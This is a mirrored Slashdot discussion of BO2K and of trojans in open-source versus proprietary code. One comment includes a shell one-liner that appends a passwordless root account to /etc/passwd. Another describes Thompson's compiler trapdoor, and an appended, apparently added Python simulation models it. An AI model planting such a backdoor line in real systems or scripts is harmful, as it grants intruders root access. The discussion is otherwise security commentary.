Slashdot Mirror


Open Source Concerns: Trojan Horses In the Code

crisco writes to us with an article from InternetWeek addressing the concern of "trojan horse programs concealed inside open source code that could create new security headaches for IT managers", as the article says. The article deals mainly with the BO2K issue, which makes the whole open source connection a bit of a stretch.

38 of 186 comments

  1. FUD by Anonymous Coward · · Score: 2

    What? Open source programs are LESS likely to have trojans, right? If you follow common sense logic, any code that is open to review by peers is less likely to have any trojans/bugs, etc.

    FUD, nothing more.

  2. Where to begin... by J4 · · Score: 5

    Trojan horse programs concealed inside open source code could create new security headaches for IT managers. One such program released last week, BackOrifice 2000...

    BO2k isn't concealed inside another program..

    When virus writers moved to an open source model in 1996, there was an explosion in macro viruses,...

    Ah yes, I remember the good old days of proprietary virii...NOT.
    The explosion in macro virii wouldn't have anything to do with a program that
    could _host_ them now, would it?
    Like, I don't know, maybe MS Office?
    No mention of how much easier it is to construct
    a macro virus as opposed to a real virus done in, say, x86 assembler.

    Organizations "absolutely should be putting
    security measures in place if they use NT to a
    great degree" to thwart BO2K-specific attacks,
    said Drew Williams, director of Axent Technologies'
    SWAT Team.


    Hmm, not quite sure what to say about this one...
    Are they saying:
    A)You don't need security if you don't use NT
    B)You shouldn't use NT (I'll buy that)
    C)If you only have one NT box you don't have to worry
    D)Win9x, 3.1 aren't vulnerable

    Internet Security Systems researchers have
    already decoded BO2K protocols and encryption
    algorithms.


    Nice trick...somebody must have sent them the source
    code in an encrypted email, yeah, that's
    the ticket...

    Jason Garms, product manager for NT security at
    Microsoft, said the company will fix any known
    security vulnerabilities in its operating
    systems. "There's nothing wrong with [Microsoft]
    systems until Back Orifice is installed.


    Oh my.... Somebody should start
    a 12 step group for folks like this
    I detect some serious denial problems here.
    How much are these fixes going to cost?
    When can we expect delivery?
    That's what I thought...

    Users on NT networks that
    exchange files and use Internet chat systems
    are at the highest risk....


    So..don't use your network to
    transfer files..just look at the pretty lights....

    The elite hacker group is banking on tools
    such as BO2K to eventually force Microsoft
    to correct security weaknesses in its operating
    systems.
    Security experts don't see the logic.
    "They didn't have to write code and
    release it to the public," said ICSA's Thompson.


    The bastards, how _dare_ they try
    to push around Micros~1!
    Who's the real victim here? Micros~1
    or the "Security Experts" who have to get
    off their well padded rear ends and do some work now?
    Oh wait, I guess security expert is a synonym for pundit now.

    Once the program is released,
    Axent's Williams expects an "immediate
    spike" in hacking activity
    on NT systems, but expects it to trickle down to
    some level of manageability.


    The program is already released, Sparky...
    I expect this is true if we use hacking in the
    proper sense as in "Micros~1 programmers fixing
    things up a bit"..
    Though I expect if you replace "hack" with "kludge"
    it'd be a little more accurate

    Now _this_ is the kind of story I expect to see on /...
    Just like backinaday ;P

  3. Re:possibly misinterpreted by Trepidity · · Score: 3

    I found that humorous as well. Macro virus authors didn't "choose" an open source development model. Their source is available because it's in a macro, so the source has to be available. It's like saying that DOS .bat script writers have switched to open source, or that bash shell script writers have switched to open source, as if they had a choice.

  4. Oh my... by pigeon · · Score: 2

    .. these kind of tools, like bo2k have the potential to harm windows 2k very much.. to wipe it out of the marketplace.. to even destroy microsoft.. that would be terrible! That would be tragic!

    La. La. La la la.

  5. Re:possibly misinterpreted (virii) by krynos · · Score: 2

    I remember in 1994 reading the 40Hex and NuKE Info Journal that had source code to viruses, sometimes only the binary or disassembled and commented source (from binaries). Having virus and trojan source code is nothing new (40Hex and NIJ did exist a while before I had net access).

    I still wonder what happened to them.

    Interestingly, the viruses were very often using undocumented functions in MS-DOS (and not only the InDos flag), some were really incredible.

  6. Re:possibly misinterpreted by Gregg+M · · Score: 3

    When virus writers moved to an open source model in 1996, there was an explosion in macro viruses,

    Excuse me?? Macro Viruses? Wasn't it Microsoft's own macro language that resulted in the rise of Macro Viruses? Open source had nothing to do with it. Damm, read that line again, what a load of Bullsh#t!

    If you go to the BO2k website you'll see that Microsoft uses the STEALTH feature in their own product.

    www.cultdeadcow.com/news/pr19990719.html

    SMS is Microsoft's remote admin tool for Windows. As it happens, SMS has a nearly identical
    stealth feature. As a matter of fact, they explain this feature in a Word document available
    from the Microsoft website:

    --
    Linux is only free if your time has no value. Windows is only free if you threaten to use Linux.
  7. Verification group? by Improv · · Score: 2

    It would be interesting and useful to make an OSS
    verification group which would audit open source
    projects for security problems (intentional or no),
    determine what platforms the source compiles on,
    look for bugs, and ideally submit patches back to
    authors and possibly sell support and/or legal
    liability for program failings.

    --
    For every problem, there is at least one solution that is simple, neat, and wrong.
    1. Re:Verification group? by dkusters · · Score: 2

      A verification group for OSS is a large order. There are several smaller groups working on different code bases. One of the more thorough would probably be the OpenBSD group (http://www.openbsd.org/). They constantly scour their source base (originally forked off of another *BSD group) for security problems. Due to the diligent efforts of the OpenBSD group, their operating system can be quite justifiably touted as the most secure standard operating system that is somewhat widely used.

  8. possibly misinterpreted by pridkett · · Score: 4

    I think that you might have misinterpreted what this article is about. It is merely an article about Bo2k and how the fact that it IS open source will cause problems for people. Meanwhile, it eludes the somewhat minor problem of people writing patches for legitimate software that turns it into trojan-like software.

    However I did glean a few bits of interesting stuff. Mainly that Microsoft is saying that if it's a real remote admin tool then it wouldn't hide from the administrator. Umm, excuse me, I have the displeasure of having an NT server box here at work that I'm pseudo responsible for and NT Server Manager hides.

    Secondly it doesn't mention the fact that if NT were written worth a damn, then it wouldn't be POSSIBLE to do this sort of stuff to it. There was the comment about it preying on users and not administrators, which is partially true, but it's really MS's fault in the first place.

    There was only one other thing that I disagreed with. It said something about when virus writers switched to open source in 1996 (like it was some sort of heavenly revelation) that there was proliferation in macro viruses. This may be true. But it's more likely due to the rise of people who are using IE and Outlook for their net browsing and email reading.

    Oh well, if nothing else the cDc by releasing the source code will actually FORCE Microsoft to patch the hole and release patches that detect the software.

    --
    My Slashdot account is old enough to drink...
    1. Re:possibly misinterpreted by dirty · · Score: 2

      The argument that if NT were a real OS this wouldn't be possible is pure bull. The same thing is quite possible on *nix. Look at vnc, it's essentially the same thing, it lets you act as if you were sitting right in front of the console in X windows. Or telnetd, it lets you pretend you are right at the console. Simple unix trojan horse program that allows pretty much the same level of control:

      #!/bin/sh

      echo foo::0:0::/:/bin/sh >> /etc/passwd

      Just get some fool to run this program as root, and boom, you now "0wn" his box. Don't think just because you are using *nix that you are somehow safe from this type of attack.

      --

      -matt
    2. Re:possibly misinterpreted by Benjamin+Shniper · · Score: 2

      I think you hit the nail on the head.

      But if the article was about Bo2K, then it would not mention Linux or Apache. Why did the author feel the need to compare these two secure, useful programs with one that was, at best, created to take advantage of computer systems' vulnerabilities? Perhaps, pervertedly, the author is claiming that Back Orifice, just like its open source brothers, is a threat to Microsoft. If linux must share the spotlight with hacking of this caliber, then linux should lead the charge to eliminate this bad omen.

      Microsoft has been in the habit of claiming that the next version (windows 2000) will cure all ills. As any computer scientist knows, all OS systems need to make trade-offs though. They have, for example, traded security and openness for quick financial gain. Back Orifice is the least productive way to cause Microsoft harm, as it does nothing but make Microsoft look like a helpless victim against sneak attacks. It won't take all two of the reporter's brain cells firing to compare that to the "attack" from linux.

      -Ben

  9. FUD. by jjohn · · Score: 2

    This is an old issue. Not totally without merit, but as companies like Red Hat come to depend on OSS code, I'm sure some amount of QA will be done.

    Further, OSS has been around a long while. This sort of thing can happen, but it doesn't last too long.

    Sounds like a case of old-fashioned FUD.

  10. Re:Why Bother? by dattaway · · Score: 2

    Why bother with articles like this? Because issues about security need to be discussed. It's bringing valuable topics that can educate more people about why security is too underrated and how to make it top priority. We need to share more horror stories that are often hidden in fear and shame so people will start to value what a good system can do to protect their resources. Expect to see articles like this many times in the future.

  11. Serious mis-interpretation going on here by Bruce+Perens · · Score: 4

    The article does not say that Open Source has more security problems.

    The article says that because Back Orifice is open source, there will be more variants of Back Orifice, and that this will be more of a problem for virus detection vendors.

    However, the security problem exploited by Back Orifice is Microsoft's fault. The release of Back Orifice is an attempt to force Microsoft to deal with its security problems.

    Folks, if you are running software that has wide-open security problems, like Back Office, and the vendor won't help you except to give you sorry band-aids like virus detection software, it's time for you to lean on that vendor. There is no reason for Microsoft to continue to leave the barn door open - they are every bit as guilty as the computer criminals who exploit that, and in a just world MS executives would be charged, tried, and jailed for the computer crime they have facilitated.

    Thanks

    Bruce Perens

  12. Dogs and cats.. living together.. MASS HYSTERIA! by Z0z · · Score: 3

    BO2K (or BO for that matter) do not exploit anything. Ever hear of "Remotely Possible","PC Anywhere", or any one of the numerous other remote control products? The only security flaw it seems to be exploiting is the ease of hiding a process from the user. This isn't to say that BO isn't a security risk, because it most definitely is. Maybe that is mainly due to the mindset of most Microsoft product users, but other users of other systems are not immune.

    Basically BO enables a single-user system to act with some of the functionality of a multi-user system. Something Windows 9x definitely doesn't have the security for. Windows NT has some protection in this realm, but still, not enough for a multi-user system. They were never designed to be multi-user systems. But then again, a root kit will enable the same functions on a linux box as this does on a Windows box, it just may be a bit more of a challenge to get the thing installed.

    One interesting flaw (well, IMHO it's a flaw) that this could potentially exploit with the right plug-in, is a feature of the MS Crypto-API that will release any certificates installed in the system. If someone teaches the BO doggy a new trick to extract certificates (which as a process of the user, it has the right to do, WITHOUT authentication) there could potentially be a big problem with digital signatures, which are now becoming accepted as substitutes for "wet" signatures (think: paper and pen).

    Oh.. think of the possibilities..


    P.S. - I am a spelling and grammer genius. Any errors you think you see in this document are probably just transmition errors, and most likely your fault.



  13. OSS & Macros - quite the opposite actually by Booker · · Score: 2

    When virus writers moved to an open source model in 1996, there was an explosion in macro viruses, ICSA's Thompson said.

    Isn't it actually the other way around? I thought that macros were by definition open source (i.e. not compiled) so variants were easily proliferated. This is different from saying that once "virus hackers" decided to open their source, people suddenly had new tools to create macro viruses.

    p.s. damn, I was gonna use that sig! :)

  14. The article is Right On the Mark! by PD · · Score: 2

    I've already seen a trojan hiding in a program. I was looking at this whizbang spreadsheet and it had an entire FLIGHT SIMULATOR built into it. Can you imagine that some hacker who had access to the source code can slip something like that into the code? Good thing it was harmless and didn't format my hard drive.

    Yup, that open source is DANGEROUS.....er, wait a sec....me very sorry....the spreadsheet was Microsoft Excel....nevermind.

  15. Quite the opposite... by Stiletto · · Score: 2

    I'd be more concerned about trojan horses in closed-source, proprietary programs, because for the most part they are not subject to the same amount of peer-review as their open-source counterparts.

    1. Re:Quite the opposite... by wiggles · · Score: 2

      Case in point:

      Blizzard Entertainment, during the first week of release for Starcraft for Windows, had the program send a copy of the windows registry (without informing the user) to Blizzard whenever a luser logged on to battle.net to play SC over the internet. I remember a massive stink over that....They claimed that they used the information for "support" purposes. Who knows what they really did? The code was closed source, so you couldn't tell.

      But I don't think this is what that article was saying. It looks like it's talking more about open source hacker tools, and how they can be easily modified quickly.

  16. Re:FUD? by jerodd · · Score: 3

    Actually, the term FUD came about by the CEO of Amdahl when he first started making S/370 clones and IBM used FUD marketing tactics against him (i.e. Amdahl can't build a computer, they only have 25 staff, Amdahl has no support infrastructure, blah blah blah). The CEO of Amdahl thus invented the term FUD (but certainly not the technique, *grin*).

    Cheers,
    Joshua.

    --
    --jon. Postel is dead. May we all mourn his, and our, loss.
  17. Dijkstra by AJWM · · Score: 2

    (I always find Dijkstra's 'gotos considered harmful' hilarious. The man is so narrow minded B-)

    You've got to remember that Dijkstra was writing that in an era when most programs were still being written in assembler, COBOL, or FORTRAN IV. Anyone who has had to maintain e.g. a FORTRAN IV program will sympathize with the sentiment.

    Then too, Dijkstra was a Burroughs Fellow, and Burroughs was well known for machines whose "assembly language" was a variant of ALGOL.

    Before I read this I thought all those backdoor stories in Heinlein books or Gibson's stuff were just urban myth

    Not at all. Backdoors were (are?) fairly common to allow access to special or privileged functions for maintenance/debugging (or cracking). My favorite was the phrase "Springhead, this is worker", borrowed from a Firesign Theatre sketch.

    --
    -- Alastair
  18. Re:FUD? by QuMa · · Score: 2

    http://www.opensource.org/halloween/

  19. Did you people read the article? by kmj9907 · · Score: 3

    It's not saying that a trojan horse will be hidden w/in the code, it's saying that trojan horse programs can cause more trouble if they're open source, due to the fact that variations can be made. It's still a tremendous amount of misguided and misrepresentative FUD though.

    kmj
    The only reason I keep my ms-dos partition is so I can mount it like the b*tch it is.


  20. Why Bother? by tomreagan · · Score: 2

    Why do we bother even responding to these articles? Anyone with half a brain can see that their arguments make no sense and that this is just incredibly stupid analysis.

    Personally, I think we would all be well served to just leave articles like this alone and not waste our breath on them.

  21. Missing the point of BO2K by KevinRemhof · · Score: 2

    This article has a very interesting slant. It seems to regard the cDc as a legitimate software company. Just because they say that BO2K is a remote admin tool, doesn't mean that's what it is for.

    Open Source is not the problem here. Open Source can help with problems like Trojan horses. The problem is those people who intend to use this software for breaking into NT machines. No NT Admin is going to download this thinking that he's going to administrate his network better with this. There are plenty of other tools out there that can do that.

    cDc has developed a potentially malicious tool if used for its proper intent. No one should see it as anything else.

  22. Re:The real Trojan Horse by methuseleh · · Score: 4

    So, the article is saying, essentially:
    "Beware of GEEKS bearing gifts"

    Sorry ;)

    --
    Think Green... Burn only 100% recycled dinosaurs in you car.

  23. Open-source Trojan Horses by IntelliTubbie · · Score: 2

    To start, one thing needs to be clarified: This article has nothing to do with Linux or the open-source community, per se. Peer-reviewed open source programs (e.g. anything with the GPL) undergo great scrutiny by a virtual army of developers to ensure that the software IS secure.

    The problem with BO2K being "open-source" is that crackers will NOT publish their modifications to the code. This will allow BO2K to potentially fragment into several mutated versions, each slightly different from the next. This makes it more difficult to detect and guard against all variations of BO2K, since crackers might be able to make small modifications to the software that would allow it to slip by security software undetected.

    --

    Power corrupts. PowerPoint corrupts absolutely.

  24. Re:The real Trojan Horse by remande · · Score: 3

    Or, to look at the other end,

    Beware goddesses bearing apples.

    --

    --The basis of all love is respect

  25. Don't see the issue. by Restil · · Score: 2

    The article basically just complains about the motives of cDc and the fact that the open source nature of the program will make it difficult for antivirus software to detect different strains and will allow other "malicious" coders a head start.
    However, the article doesn't really discuss anything about dangers to the open source movement itself, and I don't really see these dangers either.

    Ok, so somebody writes their own copy of, let's say, telnetd with a built in trojan horse. Well, this has already been done before, just download a rootkit from rootshell.org if you want it. nothing new.

    Of course, if this trojan was to make it into an official distribution it would have to get by several pairs of eyes first. Say I found some clever way to insert a trojan horse into the kernel itself. In order for it to make it into the official kernel release, Linus himself would have to approve the code (or some other competent coder would). Since not just ANY code is blindly inserted into the kernel, I seriously doubt this would work.

    Most other open source is handled in the same way. There's always someone who reviews changes before it gets into the primary release, and even if that person was sleeping that day, eventually someone would discover it, and the coder would be exposed. I just don't see it as a problem.

    -Restil

    --
    Play with my webcams and lights here
  26. Re:FUD, Microsoft's Influence, and What am I going by jfunk · · Score: 2

    I've played around with BO2k already. Great tool for remote admin - in a market where other packages cost an arm and a leg. If the AV companies all delete the hell out of BO2k, I'm not going to be able to use it, because I'm thinking I will rely on both. (the upcoming plugins for bo2k will help in software distribution GREATLY.) what should I do? I don't know enough C/++ whatever to modify what the signature would be - maybe some tips?


    I'm interested in BO2K for the same reasons as you. I use VNC all the time to fix the bi-daily problem with my brother's 98 machine. I also connect to my machine from work and school to check mail, read documentation, etc.

    Frankly, I don't see the security risk. Putting BO2K on my brother's computer is no different than putting VNC or PC-Anywhere on it.

    I'll try out BO2K when there is a *NIX client. My favourite VNC feature is the Java client so that I can use it within a browser without having to download stuff.

    As for your AV problem, I suggest you find out what your AV software does (or will do) regarding BO2K. I think nothing is appropriate. This is a tool, and anybody who is scared of it is, well, not very computer-literate. According to the site, there is no known way to detect it running on a remote machine. That's a good thing. There's obviously no backdoor, or we'd all know about it now.

    Any AV company who discriminates against BO2K needs a stern talking to. Imagine if AV software automatically deleted Linux partitions from your HD. It's a similar situation, discriminating against OSS alternatives to proprietary software. On my computer at school, the previous user turned on the AV features and password protected it (I would have fixed that, but I haven't rebooted it in months, and don't care to). It detects in the boot sector, oh my god, a VIRUS!!! Sorry, only LILO. Imagine the new user who installs Linux only to get this message, thinking it's real.

    That can't be good.

  27. there already is! by EnderWiggnz · · Score: 2

    you see... the open source community is the security verification group. when one of the Xmillion number of linux users says "hey, i can hack this using only 4 lines of code", the open source community springs into action, and says.... oh... ok, here's the patch....

    The appearance of a trojan is nil, as everyone could see the backdoor in plain view, and close it, and then flame the heck out of whoever tried to put it in.

    Security by Obscurity does not work. Just look at NT... or MacOS-X...

    --
    ... hi bingo ...
  28. What they really mean... by jmweeks · · Score: 3

    A rather misinformed and misleading article such as this really means when starting an article with "Trojan horse programs concealed inside open source code" is "Look at me!" In other words, a poorly masked use of attention-getting buzzwords with little knowledge of their meaning or proper use.

    Is the bo2k open source? Apparently. Will that help its proliferation? Probably, although as far as I have read it is made to be particularly evasive in the first place. Does this have any relevance to the common usage of the term "open source" and the people who will be drawn to read the article based upon its use of this term? Of course not.

    To make matters worse, and to muddy the waters to a point obvious to anyone reading the proliferation of comments on this topic, this article refers to bo2k as a trojan horse. This is completely and totally untrue and misleading. A trojan horse is a program that embeds itself in another, allowing itself to be executed (usually unnoticed) when the enclosing program is run. Such a practice is devious and obviously viral and totally unlike this program.

    Back Orifice's server is an executable program that runs in and of itself. It does so very quietly and (due to, in my opinion, an oversight on Microsoft's development) is difficult to detect. It is a server program, an application, and in no way a trojan horse.

    The reason this has muddied the waters, at least at slashdot, is that the image of a trojan horse in open source software (in other words, offending source code placed unnoticed in trusted source code) provokes most open source advocates to bring up the issue of peer review's ability to eliminate such 'trojan horses.' These arguments, though accurate, are completely irrelevant when one considers that there are not trojan horses (either in source code or executable form) involved.

    But the article did what was intended: It provoked many of us to read it that would not have otherwise. Congrats.

    Oh, and as a side note: I have seen it mentioned many times that Back Orifice exploits security risks in Windows operating systems. Basically, this is untrue. I am not a Microsoft fan by any stretch of the term, but I find it hard to fathom people considering a server program, run with the equivalent of root privileges, as exploiting security risks if it can actually control a system. Telnetting (or more wisely ssh'ing) in to a unix box of any variety that I know and su -'ing allows anyone with knowledge of the root password the ability to control basically any aspect of the system in question. The two security holes that this exploits are the inadequate task management of Windows OS's and the overuse of administration-level accounts in doing user-level operations. Oh, and the execution of untrustworthy applications, which can not (except perhaps in the case of macros) be blamed on MS.

  29. Security through obscurity... by dsaxena · · Score: 2

    ...blah blah blah.

    Yes, OSS makes it easy for disgruntled people to get trojan code into a program, but there are several ways to deal with this.

    • Only download code from trusted sources. This means that you only get the latest gnome patches from the gnome website or from official mirrors. If you follow this
    • In addition to this, use PGP/GPG signatures to validate what you are getting against the official distribution. If you download an official distribution of a package, it is safe to assume that patches have been looked at by several sets of eyes to ensure that they are OK before they were added to the code base.
    There is a misconception by IT suits that there is a complete lack of change control in Open Source projects. The people where I work had this misconception that I could do a search for "linux device foobar2000x drivers" and would find hundreds of different patches. IMHO, Open Source projects are one of the best examples of change control as maintainers sift through many different patches before deciding which ones are worth applying.


    Deepak Saxena
    Project Director, Linux Demo Day '99

    --
    Deepak Saxena
    "Computers are useless, they can only give you answers" - Picasso
  30. Thompson's trojan virus, and why not to sweat it. by Ungrounded+Lightning · · Score: 3

    The hack was in the C compiler. It consisted of two parts:

    - If the compiler recognized that it was compiling the login program, it expanded a canned macro that added a trapdoor - a canned login and password that gave root access.

    - If the compiler recognized that it was compiling itself, it expanded a canned macro that added the recognize-and-expand-canned-macros code, along with the macros, to the new copy of the compiler.

    You only have to compile this in once, after which you can throw out the patch and it propagates to later versions of the compiler. BUT:

    - It only lives in compilers.

    - It only works as long as they're being compiled by themselves, in a never-ending stream. It will NOT propagate to a new compiler implementation, such as making the hop from PCC to gnu, or being installed in a new version of PCC that was compiled by gnu rather than PCC. (In principle you could build one that recognized TWO or more compilers and could hop back and forth, though that makes it twice as fragile.)

    - It will die as soon as a change to the compiler source renders the signature unrecognizable.

    - Even if it is alive, it stops inserting trapdoors once the signature of the target program changes.

    Rumor has it that this was actually propagated in the Portable C Compiler {PCC}, and was discovered and cleaned out when the guys at Berkeley wrote strings, and wondered why the compiler had the string "login".

    Note that this is MUCH easier to do with a proprietary compiler than an open one. Gcc, for instance, is shipped in source, with a build file that lets it be built by just about any C compiler, not just an older gcc. Even if a Thompson trojan virus existed for gcc, it isn't inserted when you compile with another compiler, producing a clean gcc that only has what its own source implies and only emits what the target's source implies. (It's almost as if NONinfection was infectious.)

    So even a security paranoid like myself isn't worried about trojans that aren't there to be spotted in the open source.

    --
    Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
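As an added illustration (not code from the comment above, from the article, or from Thompson's paper), the toy Python model below encodes the two recognizers the comment describes and then checks each rule it lists: the trojan survives a self-build, the trapdoor lands in login, the compiler's source stays clean while strings(1) on the binary gives it away, it dies when the compiler's own signature changes, it falls silent when login's signature changes, and it cannot hop across to a compiler built by an independent implementation. The "compiler" here is an identity copy of source text into a pretend binary; the signatures, payload strings, sample sources and names (PCC_SRC, GNU_SRC, run_scenarios) are all constructed stand-ins, not anything from a real compiler.

```python
"""Toy model of the Thompson compiler trapdoor described in the comment.

Added illustration, not code from the comment or from Thompson's paper.
The "compiler" copies source text verbatim into a pretend binary; the
signatures, payloads and sample sources are constructed stand-ins.
"""
from dataclasses import dataclass
import re

# Constructed: the two source-text patterns the trojaned compiler keys on.
LOGIN_SIGNATURE = "int login(const char *user, const char *pw)"
COMPILER_SIGNATURE = "int compile(const char *src)"

# Constructed payloads. TRAPDOOR is the canned credential check spliced
# into login; MACRO_ENGINE is the recognise-and-expand code plus its macros,
# which a trojaned compiler copies into any compiler it builds.
TRAPDOOR = '  if (!strcmp(pw, "canned-password")) return ROOT_SHELL;\n'
MACRO_ENGINE = "/*macro-engine*/" + LOGIN_SIGNATURE + COMPILER_SIGNATURE + TRAPDOOR


@dataclass
class Binary:
    """A pretend compiled program; `text` stands in for its machine code."""
    name: str
    text: str


@dataclass
class Compiler(Binary):
    """A compiled compiler. `trojaned` describes the binary only; the source
    it was built from may be perfectly clean."""
    trojaned: bool = False

    def compile(self, source: str, name: str, is_compiler: bool = False) -> Binary:
        text = source            # honest translation: identity copy
        carries_trojan = False
        if self.trojaned:
            if LOGIN_SIGNATURE in source:
                # Part 1: recognise the login program, splice in the trapdoor.
                text = text.replace(LOGIN_SIGNATURE + " {",
                                    LOGIN_SIGNATURE + " {\n" + TRAPDOOR, 1)
            if COMPILER_SIGNATURE in source:
                # Part 2: recognise a compiler, carry the macro engine forward.
                text = text + "\n" + MACRO_ENGINE
                carries_trojan = True
        if is_compiler:
            return Compiler(name, text, carries_trojan)
        return Binary(name, text)


def strings(binary: Binary, min_len: int = 4) -> list[str]:
    """Rough model of strings(1): printable runs found in the binary."""
    return re.findall(r"[ -~]{%d,}" % min_len, binary.text)


def has_trapdoor(binary: Binary) -> bool:
    return TRAPDOOR.strip() in binary.text


# Constructed sample sources.
LOGIN_SRC = LOGIN_SIGNATURE + " {\n  return check_password(user, pw);\n}\n"
PCC_SRC = COMPILER_SIGNATURE + " {\n  return emit(parse(src));\n}\n"
GNU_SRC = "int gnu_compile(const char *src) {\n  return gnu_emit(gnu_parse(src));\n}\n"
# Harmless refactors that happen to change the text the trojan keys on.
PCC_REFACTORED_SRC = PCC_SRC.replace(COMPILER_SIGNATURE, "int compile_unit(const char *src)")
LOGIN_REFACTORED_SRC = LOGIN_SRC.replace(LOGIN_SIGNATURE, "int login(const struct cred *c)")


def run_scenarios() -> dict[str, bool]:
    """Check each rule from the comment; every value should come out True."""
    # Patient zero: a PCC binary built once with the patch applied, after
    # which the patch itself can be thrown away.
    pcc = Compiler("pcc", PCC_SRC + "\n" + MACRO_ENGINE, trojaned=True)
    gcc = Compiler("gcc", GNU_SRC)        # independent, clean implementation
    r = {}
    pcc2 = pcc.compile(PCC_SRC, "pcc", is_compiler=True)
    r["self_build_propagates"] = pcc2.trojaned
    r["login_gets_trapdoor"] = has_trapdoor(pcc2.compile(LOGIN_SRC, "login"))
    # The source that produced pcc2 never mentions login; only the binary does.
    r["compiler_source_is_clean"] = "login" not in PCC_SRC
    r["strings_reveals_login"] = any("login" in s for s in strings(pcc2))
    pcc3 = pcc2.compile(PCC_REFACTORED_SRC, "pcc", is_compiler=True)
    r["dies_on_compiler_signature_change"] = not pcc3.trojaned
    r["silent_on_login_signature_change"] = not has_trapdoor(
        pcc2.compile(LOGIN_REFACTORED_SRC, "login"))
    pcc_via_gcc = gcc.compile(PCC_SRC, "pcc", is_compiler=True)
    r["cross_compiler_hop_fails"] = (not pcc_via_gcc.trojaned
                                     and not has_trapdoor(pcc_via_gcc.compile(LOGIN_SRC, "login")))
    return r


if __name__ == "__main__":
    for rule, holds in run_scenarios().items():
        print(f"{rule:36s} {'holds' if holds else 'VIOLATED'}")
```

The strings() check is the defender's takeaway: a compiler whose source never mentions "login" but whose binary does is exactly the discrepancy the comment says the Berkeley people stumbled on, and it is a check that works only because the source is available to compare against.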
  31. Re:FUD? by cdlu · · Score: 2

    "Fear, Uncertainty, Doubt" - cheap marketing strategy.

    It seems to me the term was brought into more common usage by the Halloween documents (they're no longer posted anywhere I can find them).

  32. Re:The real Trojan Horse by Farce+Pest · · Score: 2

    Which is an argument for:

    1) Get your kernel from one of the standard sources, i.e. kernel.org or a mirror.

    2) Verify the PGP signature.

    Then, at least, you know you are running a real release, the same one hundreds of thousands of other people are running, and not one that someone has subsequently hacked.

    The other question is: How do we know the real release wasn't hacked? Short of looking yourself, there are many other people using the same code, including developers, and also people who analyze the patches to summarize changes. Even if a trojan patch did slip Linus' attention, it would be discovered very quickly and removed quicker.

    (And yeah, it's the Greeks, but which ones? The Trojans were Greek too, weren't they?)

    --
    This message has been scanned for memes and dangerous content by MindScanner, and is believed to be unclean.
  33. The real Trojan Horse by Farce+Pest · · Score: 4

    People never seem to remember the important lesson of the original Trojan horse. The Trojans left this nice horse statue as a gift, and the suckers (can't remember who the Trojans were at war with) take it inside their secured area. Later that night, the Trojans hidden inside the horse jump out and kill them.

    The lesson: Look inside the friggin' horse, you stupid idiots! And THAT is something you can do with open source that you cannot do with closed, proprietary software.

    --
    This message has been scanned for memes and dangerous content by MindScanner, and is believed to be unclean.
  34. Re:Completely the opposite... by Syslevel · · Score: 2

    Open Source makes it far easier for anybody who has decent programming skills to dig into the system and do all sorts of things. Generally on a local level, not on a widespread level as is the case with closed source OSes.

    98% of the world's computer users are 'dumb enough' to use software they didn't compile themselves, from source code they personally reviewed. Actually that should be 99.99% of the world, since there isn't anybody here reading this message who has read every bit of source code for every thing s/he runs.

    Open Source turns it into a "local" problem rather than a 'big scale' problem as is the case when unfriendly code is widely distributed in closed source software.

    "Peer review" doesn't solve anything if Hacker X at Podunk Corporation slips an exploit into the payroll machine.

    It's a far more complex issue than many people in this discussion thread seem ready to recognize.